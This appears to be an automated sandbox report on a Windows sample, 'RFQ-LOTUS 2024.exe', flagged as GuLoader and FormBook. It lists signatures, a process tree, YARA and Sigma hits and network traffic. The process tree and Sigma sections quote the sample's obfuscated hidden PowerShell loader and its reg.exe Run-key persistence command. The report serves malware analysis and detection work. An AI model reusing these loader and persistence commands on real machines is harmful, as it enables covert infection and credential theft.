Edit tour

Windows Analysis Report
RFQ-LOTUS 2024.exe

Overview

General Information

Sample name:	RFQ-LOTUS 2024.exe
Analysis ID:	1435343
MD5:	e0360d9d8f69298a258f82881cf980ff
SHA1:	2a56fa9ae0db6d32489f98aef68a6ad3ef75aa2b
SHA256:	d94de28be7562e264ca015a2f1f0001744354b15a18551fcc786a5b9c47fb068
Tags:	exe
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected FormBook

Yara detected GuLoader

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Obfuscated command line found

Powershell drops PE file

Sample uses process hollowing technique

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Dosfuscation Activity

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

RFQ-LOTUS 2024.exe (PID: 5220 cmdline: "C:\Users\user\Desktop\RFQ-LOTUS 2024.exe" MD5: E0360D9D8F69298A258F82881CF980FF)

powershell.exe (PID: 6556 cmdline: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8188 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Minken.exe (PID: 2212 cmdline: "C:\Users\user\AppData\Local\Temp\Minken.exe" MD5: E0360D9D8F69298A258F82881CF980FF)

cmd.exe (PID: 2056 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2896 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

AXeOTfZcitaZASZZQaupEOhzdyJUy.exe (PID: 1704 cmdline: "C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

fc.exe (PID: 7564 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)

firefox.exe (PID: 2496 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

chrome.exe (PID: 6312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1684 --field-trial-handle=1844,i,13896805619792055621,4904984186317892360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://473750571567004317064230583514468350804565684324378075159610742091604698238217701484029465762430135913242023857750034401559054060945654540273638867228794983640833862748912121851334807031249099092790952130035074227943842970399582505875/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2052,i,55276660867092157,14850349657690875544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

svchost.exe (PID: 7356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1387f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x192457:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17b9f6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d06b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1660a:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1387f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1387f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1387f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2597157213.000000000B490000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Click to see the 8 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Paraferingen

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2056, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)", ProcessId: 2896, ProcessName: reg.exe

Sigma detected: Potential Dosfuscation Activity

Source: Process started

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 8188, ProcessName: cmd.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Minken.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Minken.exe, ParentProcessId: 2212, ParentProcessName: Minken.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)", ProcessId: 2056, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)", CommandLine: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-LOTUS 2024.exe", ParentImage: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe, ParentProcessId: 5220, ParentProcessName: RFQ-LOTUS 2024.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)", ProcessId: 6556, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7356, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Virustotal: Detection: 36%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: RFQ-LOTUS 2024.exe	ReversingLabs: Detection: 18%
Source: RFQ-LOTUS 2024.exe	Virustotal: Detection: 36%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: RFQ-LOTUS 2024.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.31.110:443 -> 192.168.2.4:49755 version: TLS 1.2

Source: RFQ-LOTUS 2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: fc.pdb source: Minken.exe, 0000000C.00000003.2828157923.0000000007119000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923889693.00000000070CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fc.pdbGCTL source: Minken.exe, 0000000C.00000003.2828157923.0000000007119000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923889693.00000000070CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2593503966.0000000007B47000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Minken.exe, 0000000C.00000003.2734555224.0000000022DC9000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmp, Minken.exe, 0000000C.00000003.2737199263.0000000022F77000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Minken.exe, Minken.exe, 0000000C.00000003.2734555224.0000000022DC9000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmp, Minken.exe, 0000000C.00000003.2737199263.0000000022F77000.00000004.00000020.00020000.00000000.sdmp, fc.exe
Source:	Binary string: mshtml.pdbUGP source: Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb5q source: powershell.exe, 00000001.00000002.2596755674.0000000008C70000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Code function: 0_2_00406370 FindFirstFileW,FindClose,	0_2_00406370
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Code function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040581E
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_0012B5B0 FindFirstFileW,FindNextFileW,FindClose,	18_2_0012B5B0

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\frikirkernes\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 4x nop then xor eax, eax	17_2_0216C01B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 4x nop then pop edi	17_2_02166F82
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 4x nop then pop edi	17_2_02168DD8
Source: C:\Windows\SysWOW64\fc.exe	Code function: 4x nop then xor eax, eax	18_2_00119290

Source: Joe Sandbox View	IP Address: 91.195.240.19 91.195.240.19
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
